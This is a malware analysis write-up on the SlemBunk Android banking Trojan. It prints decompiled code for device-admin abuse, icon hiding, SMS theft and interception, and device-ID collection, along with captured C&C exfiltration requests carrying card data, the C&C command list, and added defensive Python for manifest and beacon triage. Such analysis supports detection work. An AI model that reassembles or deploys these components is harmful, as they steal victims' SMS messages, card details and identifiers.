Analysis of SlemBunk Trojan Samples

Source: Internet
Author: User


SlemBunk was first discovered by FireEye, and several other security companies later reported on it. The author obtained a sample and, on analysis, found the Trojan's design to be sophisticated and a solid base for further evolution. The sample disguises itself as other commonly used Android applications and tricks users into entering sensitive credit-card information. We analyze it step by step below.

1. Malicious behaviors

1.1 Lock screen control

The Trojan acquires a wake lock of type PARTIAL_WAKE_LOCK. In this mode the CPU keeps running even after the screen is turned off, until the lock is released.

Java
    public void onCreate() {
        super.onCreate();
        // level 1 == PARTIAL_WAKE_LOCK: the CPU stays awake even when the screen is off
        this.mWakeLock = ((PowerManager) this.getSystemService("power")).newWakeLock(1, "MyWakeLock");
        this.mWakeLock.acquire();
    }

1.2 Device administrator permissions

The Trojan requests device-administrator rights. If it does not already hold them, the system confirmation screen is shown. The DEVICE_ADMIN extra names the admin component, and ADD_EXPLANATION carries the explanation shown to the user.

Java
    public void checkDeviceAdmin() {
        ComponentName v0 = new ComponentName((Context) this, MyDeviceAdminReceiver.class);
        if (!this.deviceManager.isAdminActive(v0)) {
            Intent v1 = new Intent("android.app.action.ADD_DEVICE_ADMIN");
            v1.putExtra("android.app.extra.DEVICE_ADMIN", (Parcelable) v0);
            // misleading justification shown on the system dialog
            v1.putExtra("android.app.extra.ADD_EXPLANATION", "Get video codec access");
            this.startActivity(v1);
        }
    }

1.3 Hide icon

After the application is installed and device-administrator rights are active, the launcher icon is hidden. The icon-hiding code carries a small obfuscating construct that is hard to follow in smali, but once decompiled to Java it is trivial.

Java
    // always-true condition used as light obfuscation
    if ("3".equals("3") || "3".equals("1")) {
        // 2 == COMPONENT_ENABLED_STATE_DISABLED, 1 == DONT_KILL_APP: removes the launcher icon
        this.getPackageManager().setComponentEnabledSetting(new ComponentName((Context) this, Main.class), 2, 1);
    }

1.4 Scheduled tasks

Java
    private void scheduleLaunch() {
        Calendar v0 = Calendar.getInstance();
        v0.add(12 /* Calendar.MINUTE */, this.restartTimeMinutes);
        Intent v1 = new Intent("com.slempo.service.activities.HTMLStart");
        v1.putExtra("values", this.getIntent().getStringExtra("values"));
        // 0 == AlarmManager.RTC: re-broadcast HTMLStart after restartTimeMinutes
        this.am.set(0, v0.getTimeInMillis(), PendingIntent.getBroadcast((Context) this, 0, v1, 0));
    }

1.5 Obtain the running application

SlemBunk decides whether to show the credit-card phishing page based on which application is currently in the foreground.

Java
    private String getTopRunning() {
        List v1 = ((ActivityManager) this.getSystemService("activity")).getRunningTasks(1);
        // package name of the foreground task, or "" if there is none
        String v3 = !v1.isEmpty() ? ((ActivityManager.RunningTaskInfo) v1.get(0)).topActivity.getPackageName() : "";
        return v3;
    }

1.6 Retrieve SMS records

Java
    public static String readMessagesFromDeviceDB(Context context) {
        Cursor v8;
        Uri v1 = Uri.parse("content://sms/inbox");
        String[] v2 = new String[] {"_id", "address", "body", "date"};
        JSONArray v12 = new JSONArray();
        try {
            v8 = context.getContentResolver().query(v1, v2, null, null, null);
            // iterate over every inbox message and serialise it as JSON
            if (v8 != null && v8.moveToFirst()) {
                do {
                    String v6 = v8.getString(v8.getColumnIndex("address"));
                    String v7 = v8.getString(v8.getColumnIndex("body"));
                    String v9 = new SimpleDateFormat("dd-MM-yyyy HH:mm:ss", Locale.US)
                            .format(new Date(Long.parseLong(v8.getString(v8.getColumnIndex("date")))));
                    JSONObject v13 = new JSONObject();
                    v13.put("from", v6);
                    v13.put("body", v7);
                    v13.put("date", v9);
                    v12.put(v13);
                } while (v8.moveToNext());
            }
        } catch (Exception e) {
            e.printStackTrace();   // catch and return reconstructed; not in the decompiled listing
        }
        return v12.toString();
    }

1.7 Obtain the phone number

Java
    public static String getPhoneNumber(Context context) {
        String v0 = ((TelephonyManager) context.getSystemService("phone")).getLine1Number();
        if (v0 == null || v0.equals("")) {
            v0 = "";
        }
        return v0;
    }

1.8 Get DeviceID

Java
    public static String getDeviceId(Context context) {
        String v1;
        String v0 = ((TelephonyManager) context.getSystemService("phone")).getDeviceId();
        // IMEI missing or the emulator default: fall back to ANDROID_ID, then the hardware serial
        if (v0 == null || v0.equals("") || v0.equals("000000000000000")) {
            v0 = Settings.Secure.getString(context.getContentResolver(), "android_id");
            if (v0 != null && !v0.equals("")) {
                return v0;
            }
            v0 = Build.SERIAL;
            if (v0 != null && !v0.equals("") && !v0.equalsIgnoreCase("unknown")) {
                return v0;
            }
            v1 = "not available";
        } else {
            v1 = v0;
        }
        return v1;
    }

1.9 Set boot startup

The Trojan registers to start at boot and also listens for the external SD card becoming available; once the SD card is ready it starts as well.

Xml








 

1.10 Listen for text messages

The C&C channel delivers commands by text message. The AndroidManifest.xml excerpt below shows that the Trojan registers a receiver for incoming SMS that takes precedence over the system text-message application.

Xml
    <receiver android:enabled="true" android:exported="true" android:name=".riejkmdcwepoksmieru">


 

The receiver's onReceive method is as follows:

Java
    public void onReceive(Context context, Intent intent) {
        SharedPreferences v8 = context.getSharedPreferences("AppPrefs", 0);
        Object v1 = new HashSet();
        try {
            // blocked sender numbers are persisted as a serialised HashSet in SharedPreferences
            v1 = DATAWraper.deserialize(v8.getString("BLOCKED_NUMBERS", DATAWraper.serialize(new HashSet())));
        } catch (Exception v2) {
            v2.printStackTrace();
        }
        Map v3 = SendSMSRecevier.retrieveMessages(intent);   // sender -> message body
        Iterator v10 = v3.keySet().iterator();
        while (v10.hasNext()) {
            Object v7 = v10.next();
            CommandCenter v6 = new CommandCenter((String) v3.get(v7), "", context);
            if (v6.processCommand()) {
                // the SMS was a C&C command: swallow it so the user never sees it
                this.abortBroadcast();
                continue;
            }
            boolean v4 = v6.needToInterceptIncoming();
            boolean v5 = v6.needToListen();
            if (!v4 && !((HashSet) v1).contains(v7)) {
                if (!v5) {
                    continue;
                }
                // listen mode: a copy goes to the C&C server, the user still receives the SMS
                SendData.sendListenedIncomingSMS(context, (String) v3.get(v7), (String) v7);
                continue;
            }
            // intercept mode or blocked sender: exfiltrate and suppress the SMS
            SendData.sendInterceptedIncomingSMS(context, (String) v3.get(v7), (String) v7);
            this.abortBroadcast();
        }
    }

 

2. Trojan Workflow

In AndroidManifest.xml the Trojan registers for five actions, SMS_RECEIVED, ACTION_EXTERNAL_APPLICATIONS_AVAILABLE, BOOT_COMPLETED, DEVICE_ADMIN_ENABLED and com.slempo.service.activities.HTMLStart, together with several activities and one service. Apart from the main activity, the service is responsible for launching activities and requesting device-administrator rights. The flow is described below.
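As an added example (not part of the original analysis), the following Python script flags the manifest footprint described above. It embeds a constructed manifest excerpt with the four standard broadcast actions and placeholder receiver names, and a triage function that reports which receiver registers for what, treating a high-priority SMS_RECEIVED filter as its own indicator.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"   # android: attribute namespace

# Constructed manifest excerpt modelled on the actions the analysis lists;
# the receiver names are placeholders, not the sample's real component names.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="org.slempo.service">
  <application>
    <receiver android:name=".SmsRx" android:exported="true">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".BootRx">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".AdminRx" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Broadcast actions that together make up the SlemBunk persistence and SMS-interception footprint.
ACTION_FLAGS = {
    "android.provider.Telephony.SMS_RECEIVED": "sms_receiver",
    "android.intent.action.BOOT_COMPLETED": "boot_persistence",
    "android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE": "sdcard_persistence",
    "android.app.action.DEVICE_ADMIN_ENABLED": "device_admin",
}

def triage_manifest(xml_text: str) -> dict:
    """Map each receiver to the indicator flags its intent-filters trigger."""
    findings = {}
    for rx in ET.fromstring(xml_text).iter("receiver"):
        for filt in rx.iter("intent-filter"):
            # a very high priority lets this receiver see SMS before the stock messaging app
            prio = int(filt.get(A + "priority", "0"))
            for act in filt.iter("action"):
                flag = ACTION_FLAGS.get(act.get(A + "name"))
                if flag == "sms_receiver" and prio >= 1000:
                    flag = "sms_receiver_high_priority"
                if flag:
                    findings.setdefault(rx.get(A + "name"), []).append(flag)
    return findings
```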

The main activity starts the MainServiceStart service, which in turn spawns three threads that poll periodically to decide whether the foreground application should trigger the fake credit-card interface, request the deviceAdmin permission, check whether a command asks for a particular fake interface, and send sensitive information such as the phone number and IMEI. The request that sends the device information is as follows:


POST / HTTP/1.1
Content-Length: 481
Content-Type: text/plain; charset=UTF-8
Host: 181.174.164.25:2080
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

{"OS": "4.0.4", "model": "Unknown sdk", "phone number": "15555215554", "apps": ["com.android.gesture.builder", "com.android.widgetpreview", "com.example.android.apis", "com.example.android.livecubes", "com.example.android.softkeyboard", "com.joeykrim.rootcheck", "de.robv.android.xposed.installer", "de.robv.android.xposed.installer.staticbusybox", "eu.chainfire.supersu", "org.slempo.service"], "imei": "8f986e65d50f299a", "client number": "3", "type": "device info", "operator": "310260", "country": "US"}

As noted above, the Trojan decides whether to launch the fake credit-card page based on the foreground application. The fake interface is shown below:

 

The Trojan author validates the entered data strictly. First, the credit-card number must be valid and the expiry date must fall between 2014 and 2020. A billing-address page is then displayed, where the zip code and the phone number are checked for consistency with each other. Once all fields are filled in, the data is sent to the C&C host with the following request:


POST / HTTP/1.1
Content-Length: 401
Content-Type: text/plain; charset=UTF-8
Host: 181.174.164.25:2080
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

{"data": {"additional information": {"old vbv password": "123456", "vbv password": "qwerty"}, "type": "card information", "card": {"cvc": "393", "month": "12", "year": "15", "number": "4024 0238 6573 0515"}, "billing address": {"date of birth": "01.03.1990", "phone number": "212-925-2355", "street address": "dalianganjinzi", "zip code": "10002", "phone prefix": "+1", "name on card": "Zhanghua"}}, "type": "user data", "code": "-1"}
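The two beacons above, as an added example (not part of the original analysis) of how a responder can triage captured traffic: a Python function that splits a raw request, matches the User-Agent and body shape of the device-info and card-data beacons, and extracts the fields worth recording (C&C host, IMEI, root and hooking tools in the app list, masked PAN). It also applies the Luhn check and the 2014-2020 expiry window to the card beacon to confirm the client-side validation described above. The request strings are constructed from the captures, trimmed to fit.

```python
import json

UA_INDICATOR = "Apache-HttpClient/UNAVAILABLE (java 1.4)"
HEAD = ("POST / HTTP/1.1\r\nHost: 181.174.164.25:2080\r\nContent-Type: text/plain; charset=UTF-8\r\n"
        "User-Agent: " + UA_INDICATOR + "\r\n\r\n")

# Constructed samples, trimmed from the two captured beacons above.
DEVICE_INFO_REQ = HEAD + (
    '{"OS":"4.0.4","model":"Unknown sdk","phone number":"15555215554",'
    '"apps":["com.joeykrim.rootcheck","de.robv.android.xposed.installer","org.slempo.service"],'
    '"imei":"8f986e65d50f299a","client number":"3","type":"device info","operator":"310260","country":"US"}')
CARD_REQ = HEAD + (
    '{"data":{"type":"card information","card":{"cvc":"393","month":"12","year":"15",'
    '"number":"4024 0238 6573 0515"}},"type":"user data","code":"-1"}')

def luhn_ok(pan: str) -> bool:
    """Luhn checksum: the 'card must be valid' test the Trojan applies before exfiltration."""
    total = 0
    for i, d in enumerate(int(c) for c in reversed(pan) if c.isdigit()):
        if i % 2:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def classify_beacon(raw: str) -> dict:
    """Split a raw HTTP request, match the SlemBunk beacon traits and return triage fields."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.splitlines()[1:]:   # skip the request line
        k, _, v = line.partition(":")
        headers[k.strip()] = v.strip()
    try:
        j = json.loads(body)
    except ValueError:
        return {"match": False}
    kind = j.get("type")
    out = {"match": headers.get("User-Agent") == UA_INDICATOR and kind in ("device info", "user data"),
           "c2": headers.get("Host"), "kind": kind}
    if kind == "device info":
        out["imei"] = j.get("imei")
        # root/hooking tools in the app list tell the operator the device may be an analysis box
        out["tamper_tools"] = [a for a in j.get("apps", []) if any(k in a for k in ("xposed", "rootcheck", "supersu"))]
    elif kind == "user data":
        card = j.get("data", {}).get("card", {})
        pan = card.get("number", "").replace(" ", "")
        out["pan_masked"] = "*" * (len(pan) - 4) + pan[-4:]
        out["luhn_valid"] = luhn_ok(pan)
        out["expiry_in_window"] = 14 <= int(card.get("year", "0")) <= 20   # the 2014-2020 check
    return out
```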

Appendix: C&C instructions

    // SMS interception and sender blocking
    CommandCenter.commands.add("#intercept_sms_start");
    CommandCenter.commands.add("#intercept_sms_stop");
    CommandCenter.commands.add("#block_numbers");
    CommandCenter.commands.add("#unblock_all_numbers");
    CommandCenter.commands.add("#unblock_numbers");
    // device lock / unlock
    CommandCenter.commands.add("#lock");
    CommandCenter.commands.add("#unlock");
    // outbound SMS and call forwarding (strings split to hinder static scanning)
    CommandCenter.commands.add("#send" + "_sms");
    CommandCenter.commands.add("#forward" + "_cils");
    CommandCenter.commands.add("#disable_forward_cils");
    CommandCenter.commands.add("#control_number");
    // phishing page management and destructive action
    CommandCenter.commands.add("#update_html");
    CommandCenter.commands.add("#show_html");
    CommandCenter.commands.add("#wipe_data");

 
